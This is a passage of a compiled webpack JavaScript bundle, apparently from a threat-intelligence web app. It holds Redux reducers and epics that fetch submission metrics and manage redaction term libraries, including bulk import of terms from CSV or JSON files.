  var action = arguments[1];
  var type = action.type,
      payload = action.payload;

  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["b" /* FETCH_SUCCESS */]:
      return state.set('loading', false);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["e" /* SET_DATE_OPTIONS */]:
      return state.merge(payload);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["c" /* FETCH_UPDATED_TIME_RANGE */]:
      var from = payload.from,
          to = payload.to;

      var dateRange = Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils_dashboard_js__["a" /* calculateDayRange */])(from, to);
      return defaultMeta.set('dateRange', dateRange);
    default:
      return state;
  }
};

var metrics = function metrics() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;

  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["b" /* FETCH_SUCCESS */]:
      return payload;
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_immutable__["combineReducers"])({
  meta: meta,
  data: metrics
}));

/***/ }),
/* 2954 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__action_types_js__ = __webpack_require__(505);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_modules_insights_action_types_js__ = __webpack_require__(358);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_modules_insights_getters_js__ = __webpack_require__(359);




var debug = __WEBPACK_IMPORTED_MODULE_3_debug___default()('app:modules:insights:epics'); // eslint-disable-line no-unused-vars






var defaultRange = 7;

var generateDefaultRange = function generateDefaultRange() {

  var fromDate = new Date();
  fromDate.setDate(fromDate.getDate() - defaultRange);

  return {
    from: fromDate.getTime(),
    to: new Date().getTime()
  };
};

/* Format the response from the server and calculate total values */
var fromJSON = function fromJSON(response) {
  return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])(response).updateIn(['data', 'personal'], function (data) {
    return data.reduce(function (counts, metric) {
      return counts.update('TOTAL', 0, function (t) {
        return t + metric.get('count');
      }).set(metric.get('source'), metric.get('count'));
    }, Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])());
  }).updateIn(['data', 'other'], function (data) {
    return data.reduce(function (counts, metric) {
      return counts.update('TOTAL', 0, function (t) {
        return t + metric.get('count');
      }).set(metric.get('source'), metric.get('count'));
    }, Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])());
  });
};

var fetchResults = function fetchResults(ajax, url) {
  return ajax.get(url).mergeMap(function (_ref) {
    var response = _ref.response;

    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
      type: __WEBPACK_IMPORTED_MODULE_4__action_types_js__["b" /* FETCH_SUCCESS */],
      payload: fromJSON(response)
    });
  }).catch(function (err) {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_4__action_types_js__["a" /* FETCH_FAILURE */] });
  });
};

/* For now we match the date range to the selection for insights; there
 * is no independent date control for metrics */
var initializeEpic = function initializeEpic(action$, store, _ref2) {
  var ajax = _ref2.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_4__action_types_js__["d" /* INIT */]).mergeMap(function () {
    var savedDateRanges = Object(__WEBPACK_IMPORTED_MODULE_6_modules_insights_getters_js__["savedRanges"])(store.getState());
    var insights = savedDateRanges.get('insights');

    var _insights$toJS = insights.toJS(),
        from = _insights$toJS.from,
        to = _insights$toJS.to;

    var url = '/services/insights/report-submissions?from=' + from + '&to=' + to;
    return fetchResults(ajax, url);
  });
};

var changeEnclaveEpic = function changeEnclaveEpic(action$, store, _ref3) {
  var ajax = _ref3.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_5_modules_insights_action_types_js__["l" /* SELECT_ENCLAVE */]).mergeMap(function () {
    var _generateDefaultRange = generateDefaultRange(),
        from = _generateDefaultRange.from,
        to = _generateDefaultRange.to;

    var selectedEnclaveId = Object(__WEBPACK_IMPORTED_MODULE_6_modules_insights_getters_js__["enclaveSelection"])(store.getState()).get('enclaveId');
    var url = '/services/insights/report-submissions?enclave=' + selectedEnclaveId + '&from=' + from + '&to=' + to;
    return fetchResults(ajax, url);
  });
};

var fetchUpdatedDateRangeEpic = function fetchUpdatedDateRangeEpic(action$, store, _ref4) {
  var ajax = _ref4.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_4__action_types_js__["c" /* FETCH_UPDATED_TIME_RANGE */]).mergeMap(function (_ref5) {
    var _ref5$payload = _ref5.payload,
        from = _ref5$payload.from,
        to = _ref5$payload.to;

    var selectedEnclaveId = Object(__WEBPACK_IMPORTED_MODULE_6_modules_insights_getters_js__["enclaveSelection"])(store.getState()).get('enclaveId');
    var url = '/services/insights/report-submissions?enclave=' + selectedEnclaveId + '&from=' + from + '&to=' + to;
    return fetchResults(ajax, url);
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_observable__["combineEpics"])(initializeEpic, changeEnclaveEpic, fetchUpdatedDateRangeEpic));

/***/ }),
/* 2955 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "addTerm", function() { return addTerm; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "importTermsFromFile", function() { return importTermsFromFile; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "deleteTerm", function() { return deleteTerm; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchRedactables", function() { return fetchRedactables; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types_js__ = __webpack_require__(507);




/* Dispatch an action to add a new redactable term */
var addTerm = function addTerm(term) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["SAVE"],
    payload: term
  };
};

/* Handle importing bulk terms from a JSON file */
var importTermsFromFile = function importTermsFromFile(_ref) {
  var files = _ref.files;
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["UPLOAD_REDACTION_FILE"],
    payload: files
  };
};

/* Dispatch an action to delete a redactable term */
var deleteTerm = function deleteTerm(term) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["DELETE"],
    payload: term
  };
};

/* Get all redactables for a given report */
var fetchRedactables = function fetchRedactables(report) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["FETCH_REDACTABLES"],
    payload: report
  };
};

/***/ }),
/* 2956 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export loading */
/* unused harmony export currentCategoryId */
/* unused harmony export terms */
/* unused harmony export termsTextMap */
/* unused harmony export status */
/* unused harmony export allRedactables */
/* unused harmony export redactables */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__constants_js__ = __webpack_require__(412);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__action_types_js__ = __webpack_require__(507);








/* Loading is true until we determine the library type and fetch initial terms */
var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : true;
  var action = arguments[1];
  var type = action.type;

  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["FETCH_SUCCESS"]:
      return false;
    default:
      return state;
  }
};

var currentCategoryId = function currentCategoryId() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : 1;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["SET_CURRENT_CATEGORY_ID"]:
      return action.payload;
    default:
      return state;
  }
};

/* The full map of redaction terms for this user */
var terms = function terms() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["FETCH_SUCCESS"]:
      return Object(__WEBPACK_IMPORTED_MODULE_3__constants_js__["h" /* listToOrderedMap */])(payload);
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["SAVE_SUCCESS"]:
      return state.merge(Object(__WEBPACK_IMPORTED_MODULE_3__constants_js__["h" /* listToOrderedMap */])(payload));
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["DELETE_SUCCESS"]:
      return state.delete(payload.get('id'));
    default:
      return state;
  }
};

/* This store is simply used as a text-only map of all redaction terms
 * to quickly see if a term already exists */
var termsTextMap = function termsTextMap() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["FETCH_SUCCESS"]:
      return Object(__WEBPACK_IMPORTED_MODULE_3__constants_js__["i" /* listToTextMap */])(payload);
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["SAVE_SUCCESS"]:
      return state.merge(Object(__WEBPACK_IMPORTED_MODULE_3__constants_js__["i" /* listToTextMap */])(payload));
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["DELETE_SUCCESS"]:
      return state.delete(Object(__WEBPACK_IMPORTED_MODULE_2_trustar_utils__["toLower"])(payload.get('text')));
    default:
      return state;
  }
};

var status = function status() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : 'READY';
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["UPLOAD_REDACTION_FILE"]:
      return 'UPLOADING';
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["BULK_SAVE"]:
      return 'IMPORTING';
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["BULK_SAVE_SUCCESS"]:
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["BULK_SAVE_FAILURE"]:
      return 'READY';
    default:
      return state;
  }
};

/* This store holds the redactables that we fetch from the server. This store is used
 * to check whether an un-redacted term was originally a redactable. */
var allRedactables = function allRedactables() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])();
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["FETCH_REDACTABLES_SUCCESS"]:
      return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(action.payload);
    default:
      return state;
  }
};

var redactables = function redactables() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["FETCH_REDACTABLES_SUCCESS"]:
      return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(payload);
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["CLEAR_REDACTABLES"]:
      return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])();
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["DELETE_SUCCESS"]:
      return state.toKeyedSeq() // Why do this conversion?
      .filter(function (v) {
        return v.get('text').search(new RegExp(payload.text, 'gi')) < 0;
      }).toList();
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_immutable__["combineReducers"])({
  loading: loading,
  currentCategoryId: currentCategoryId,
  terms: terms,
  termsTextMap: termsTextMap,
  status: status,
  allRedactables: allRedactables,
  redactables: redactables
}));

/***/ }),
/* 2957 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_lodash_isstring__ = __webpack_require__(81);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_lodash_isstring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_lodash_isstring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_uuid__ = __webpack_require__(405);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_uuid___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_6_uuid__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_trustar_utils_utils_js__ = __webpack_require__(78);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_8_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__constants_js__ = __webpack_require__(412);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__action_types_js__ = __webpack_require__(507);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_modules_profile_action_types_js__ = __webpack_require__(116);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12__getters_js__ = __webpack_require__(710);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13__utils_js__ = __webpack_require__(1646);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__ = __webpack_require__(76);
var _slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }();











var debug = __WEBPACK_IMPORTED_MODULE_8_debug___default()('app:modules:redaction:epics'); // eslint-disable-line no-unused-vars








/* Handle fetching shared library terms */
var fetchSharedLibraryEpic = function fetchSharedLibraryEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_10__action_types_js__["FETCH_SHARED_LIBRARY"], __WEBPACK_IMPORTED_MODULE_11_modules_profile_action_types_js__["f" /* FETCH_SUCCESS */]).mergeMap(function () {
    /* Fetch library and save terms to store */
    return ajax.get(__WEBPACK_IMPORTED_MODULE_9__constants_js__["c" /* FETCH_LIBRARY_ENDPOINT */]).mergeMap(function (_ref2) {
      var response = _ref2.response;

      return [{ type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["FETCH_SUCCESS"], payload: response }];
    });
  }).catch(function (err) {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of(Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["error"])('There was an error fetching the redaction library.'));
  });
};

/* Handle shared */
var addTermEpic = function addTermEpic(action$, store, _ref3) {
  var ajax = _ref3.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_10__action_types_js__["SAVE"]).mergeMap(function (_ref4) {
    var term = _ref4.payload;

    var errorMessage = Object(__WEBPACK_IMPORTED_MODULE_13__utils_js__["c" /* validateTerm */])(term, Object(__WEBPACK_IMPORTED_MODULE_12__getters_js__["redactionTermExists"])(term.text.trim())(store.getState()));

    if (errorMessage) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of(Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["error"])(errorMessage));
    }

    term.id = Object(__WEBPACK_IMPORTED_MODULE_6_uuid__["v4"])(); // Add an id

    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_9__constants_js__["a" /* ADD_ENDPOINT */], [term]).mergeMap(function (_ref5) {
      var response = _ref5.response;
      var savedTerms = response.savedTerms,
          failedTerms = response.failedTerms;

      var action = [{ type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["FETCH_SUCCESS"], payload: savedTerms }];
      if (failedTerms.length > 0) {
        action.push(Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["warn"])('The term could not be added because it already exists.'));
      }
      return action;
    });
  }).catch(function (err) {
    return [{ type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["SAVE_FAILURE"] }, Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["error"])('There was an error adding the redaction term to the shared library.')];
  });
};

/* Handle shared */
var deleteTermEpic = function deleteTermEpic(action$, store, _ref6) {
  var ajax = _ref6.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_10__action_types_js__["DELETE"]).mergeMap(function (_ref7) {
    var term = _ref7.payload;

    return ajax.delete(__WEBPACK_IMPORTED_MODULE_9__constants_js__["b" /* DELETE_ENDPOINT */] + '/' + term.get('id')).mergeMap(function () {
      return [{
        type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["DELETE_SUCCESS"],
        payload: term
      }];
    }).catch(function (err) {
      return [{ type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["DELETE_FAILURE"] }, Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["error"])('There was an error removing the redaction term from the shared library.')];
    });
  });
};

/* Fetch all the redactable terms from the server, and alert the user to how
 * many terms we found. */
var fetchRedactablesEpic = function fetchRedactablesEpic(action$, store, _ref8) {
  var ajax = _ref8.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_10__action_types_js__["FETCH_REDACTABLES"]).mergeMap(function (_ref9) {
    var payload = _ref9.payload;

    var data = payload.getIn(['content', 'data'], '') + '\n' + payload.get('title');
    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_9__constants_js__["d" /* REDACTABLE_ENDPOINT */], data);
  }).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('response')).mergeMap(function (response) {

    var redacted = Object(__WEBPACK_IMPORTED_MODULE_12__getters_js__["redactionMap"])(store.getState()).map(function (x) {
      return Object(__WEBPACK_IMPORTED_MODULE_4_trustar_utils__["toLower"])(x.get('text'));
    });
    var redactables = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])(Object(__WEBPACK_IMPORTED_MODULE_13__utils_js__["b" /* mapRedactables */])(response).filter(function (x) {
      var text = Object(__WEBPACK_IMPORTED_MODULE_4_trustar_utils__["toLower"])(x.get('text'));
      var categoryId = x.get('categoryId');
      return !redacted.find(function (y) {
        return categoryId === 12 ? text === y : text.includes(y);
      });
    }));

    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
      type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["FETCH_REDACTABLES_SUCCESS"],
      payload: redactables
    });
  }).catch(function (err) {
    return [Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["error"])('There was an error fetching redactable terms.'), { type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["FETCH_REDACTABLES_FAILURE"] }];
  });
};

/* Top level epic for importing terms from file */
var importTermsEpic = function importTermsEpic(action$, store) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_10__action_types_js__["UPLOAD_REDACTION_FILE"]).mergeMap(function (_ref10) {
    var files = _ref10.payload;

    var _files = _slicedToArray(files, 1),
        file = _files[0];

    var type = file.type;
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].fromPromise(Object(__WEBPACK_IMPORTED_MODULE_7_trustar_utils_utils_js__["readFile"])(file)).mergeMap(function (contents) {
      var omittedTerms = 0;
      var otherTerms = 0;
      var parsedTerms = [];

      switch (type) {
        case 'text/csv':
          // $FlowIgnore
          var parsedContent = contents.replaceAll('\b', '');
          parsedTerms = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])(parsedContent.split(/\r?\n|\r/)).map(function (term) {
            var _term$split = term.split(/\,/),
                _term$split2 = _slicedToArray(_term$split, 2),
                text = _term$split2[0],
                category = _term$split2[1];

            return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])({
              text: text,
              category: category
            });
          });
          break;
        case 'application/json':
        case 'text/plain':
        default:
          parsedTerms = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])(JSON.parse(contents));
          break;
      }

      var terms = parsedTerms.filter(function (term) {
        var text = term.get('text');

        // Empty string at the end of file was parsed
        if (!text) return false;

        // Term text to short
        if (text.trim().length < 2) {
          omittedTerms++;
          return false;
        }

        // Term text already exists
        if (Object(__WEBPACK_IMPORTED_MODULE_12__getters_js__["redactionTermExists"])(text)(store.getState())) {
          omittedTerms++;
          return false;
        }

        return true;
      }).map(function (term, k) {
        var categoryId = 17; // Set the categoryId as 17 (Other) as default
        if (term.has('categoryId')) {
          categoryId = term.get('categoryId');
          if (categoryId < 1 || categoryId > 20) {
            // If categoryId is out of valid range, assign to Other
            otherTerms++;
          }
        } else if (term.has('category') && __WEBPACK_IMPORTED_MODULE_3_lodash_isstring___default()(term.get('category'))) {
          var category = Object(__WEBPACK_IMPORTED_MODULE_9__constants_js__["f" /* categoryByName */])(term.get('category'));
          if (!category) {
            // If category is not found for name, assign to Other
            otherTerms++;
          } else {
            categoryId = category.get('id');
          }
        } else {
          // If term has no categoryId or category field, assign to Other
          otherTerms++;
        }

        return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])({
          id: Object(__WEBPACK_IMPORTED_MODULE_6_uuid__["v4"])(),
          type: 'TEXT',
          text: term.get('text'),
          categoryId: categoryId
        });
      }).toMap().mapKeys(function (k, v) {
        return v.get('id');
      });

      var action = [{
        type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["BULK_ADD_TERMS"],
        payload: terms
      }];

      // Warn of omitted terms
      if (omittedTerms) {
        var pluralizedMessage = omittedTerms > 1 ? omittedTerms + ' terms were omitted because they already existed or were less than 2 characters.' : omittedTerms + ' term was omitted because it already existed or was less than 2 characters.';
        action.push(Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["warn"])(pluralizedMessage));
      }

      // Warn of terms assigned to other due to missing/invalid category information
      if (otherTerms) {
        var otherMessage = otherTerms > 1 ? otherTerms + ' terms were added to Other because they had invalid categories.' : otherTerms + ' term was added to Other because the category was invalid.';
        action.push(Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["warn"])(otherMessage));
      }

      if (terms.size > 0 && terms.size <= 10000) {
        action.push({ type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["BULK_SAVE"], payload: terms });
      } else if (terms.size > 10000) {
        action.push(Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["error"])('The number of terms exceeds 10,000. Please limit bulk imports to 10,000 terms or less.'));
      }

      /* All the terms were ommitted */
      if (terms.size === 0) {
        action.push({ type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["BULK_SAVE_FAILURE"] });
      }

      return action;
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["error"])('There was an error importing the file. Please verify that it is a valid .json or .csv file.'), { type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["BULK_SAVE_FAILURE"], payload: err }]);
    });
  });
};

/* Handle shared */
var bulkSaveTermsEpic = function bulkSaveTermsEpic(action$, store, _ref11) {
  var ajax = _ref11.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_10__action_types_js__["BULK_SAVE"]).mergeMap(function (_ref12) {
    var terms = _ref12.payload;

    /* Send to server. In response, handle any possible duplicated terms with a
     * warning message to the user  */
    var body = terms.toList().toJS();
    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_9__constants_js__["a" /* ADD_ENDPOINT */], body).mergeMap(function (_ref13) {
      var response = _ref13.response;
      var savedTerms = response.savedTerms,
          failedTerms = response.failedTerms;

      var action = [{ type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["BULK_SAVE_SUCCESS"] }, { type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["FETCH_SUCCESS"], payload: savedTerms }, Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["success"])(body.length - failedTerms.length + ' terms successfully imported.')];
      if (failedTerms.length) {
        action.push(Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["info"])(failedTerms.length + ' terms were not added because they already existed in the library.'));
      }
      return action;
    });
  }).catch(function (err) {
    return [Object(__WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__["error"])('There was an error saving bulk terms.'), { type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["BULK_SAVE_FAILURE"], payload: err }];
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_observable__["combineEpics"])(fetchSharedLibraryEpic, addTermEpic, deleteTermEpic, fetchRedactablesEpic, importTermsEpic, bulkSaveTermsEpic));

/***/ }),
/* 2958 */,
/* 2959 */,
/* 2960 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export mapMetadata */
/* unused harmony export reports */
/* unused harmony export reportList */
/* unused harmony export currentReportId */
/* unused harmony export options */
/* unused harmony export metadataCache */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types_js__ = __webpack_require__(92);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_modules_create_action_types__ = __webpack_require__(204);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_modules_constellation_action_types__ = __webpack_require__(143);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_modules_indicators_action_types__ = __webpack_require__(241);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__constants_js__ = __webpack_require__(575);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_8_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_modules_company_whitelist_action_types__ = __webpack_require__(281);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__action_types__ = __webpack_require__(92);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_lodash_isstring__ = __webpack_require__(81);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_lodash_isstring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_11_lodash_isstring__);

















/* **************************************************************************
 * REPORTS
 * *************************************************************************/

var mapMetadata = function mapMetadata(metadata) {
  var data = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(metadata);

  var reportEnclaveId = data.get('enclaves', Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])()).getIn([0, 'id'], '');
  var attributes = data.get('attributes', Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])()).toOrderedMap().mapKeys(function (k, v) {
    return v.get('guid');
  });
  var enclaveTags = data.get('tags', Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])()).map(function (tag) {
